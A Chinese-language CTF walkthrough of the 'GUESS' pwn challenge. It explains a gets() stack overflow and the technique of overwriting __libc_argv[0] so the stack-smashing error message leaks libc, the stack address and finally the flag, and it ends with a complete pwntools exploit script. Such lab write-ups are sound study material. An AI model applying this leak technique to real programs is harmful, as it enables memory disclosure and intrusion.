Question

0x00 代码分析

1，检查保护

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

开了CANARY 和 NX

2，使用IDA分析程序流程

程序将本地的flag读入栈中，sub_400A11函数中调用fork（若成功调用一次则返回两个值，子进程返回0，父进程返回子进程标记；否则，出错返回-1。），if ( !v5 ) break;-这段代码表示如果是子进程，则退出循环，进入验证流程，将用户输入的与flag比较；如果是父进程则继续循环，3次调用fork，等待所有子进程结束。

0x01 漏洞分析

gets(&s2);这里明显的栈溢出，但是程序开启了CANARY，栈溢出似乎还存在一些问题，它会进入stack_check，当__stack_check_fail时会抛出以下信息：

*** stack smashing detected ***: 之后是程序名./GUESS 会打印出正在运行中程序的名称，也就是 argv[0] 指针所指向的字符串，所以，我们只要将__libc_argv[0]覆盖为flag的地址就能将flag打印出来；同样我们也可以将其覆盖为函数plt.got地址，泄露libc基地址。

问题就在于将__libc_argv[0]覆盖为flag的地址，我们怎么能够定位栈中的flag地址呢？我们可以利用一个环境变量environ,environ处会存放当前栈中环境变量所在的位置，以此即可获取栈地址

我们有3次机会，刚刚好。我们可以任意长度覆盖，触发CANNARY，在fork子进程里，崩掉3个空间来泄露。

0X02 漏洞利用

1，我将断点下在main函数，观察参数__libc_argv[0]

可以看到 0x7fffffffdee8 地址存放的是 程序名字符串的地址，所以我们覆盖栈中 0x7fffffffdee8 这个地址内容为想要泄露的东西。

算算偏移离buf地址的偏移，0x7fffffffdee8 - 0x7fffffffddc0 = 0x128 得到偏移为 0x128，且这个偏移是固定的

接下来就是反复泄露了，第一次泄露libc，第二次泄露environ，gdb调试时测得 环境变量 所在 栈地址 距离buf地址相差 0x168，得到buf地址就再次覆盖，bingo！~~ Tips：falg.txt我本地建了一个，详见exp

0x03 完整脚本

from pwn import *
e=ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
environ =e.symbols["environ"]
read_got=0x602040
p = process("./GUESS")

p.recvuntil("flag\n")
p.sendline("1" * 0x128 + p64(read_got))
print p.recvuntil("***: ")
read_offset = u64(p.recv(6).ljust(8, "\x00"))
libc = read_offset - e.symbols["read"]
environ += libc
print hex(libc)

p.recvuntil("flag\n")
p.sendline("1" * 0x128 + p64(environ))
print p.recvuntil("***: ")
stack = u64(p.recv(6).ljust(8, "\x00"))
print hex(stack)


p.recvuntil("flag\n")
p.sendline("1" * 0x128 + p64(stack - 0x168))
print p.recvuntil("***: ")
print p.recvline()
p.close()

0x04 运行结果

文件下载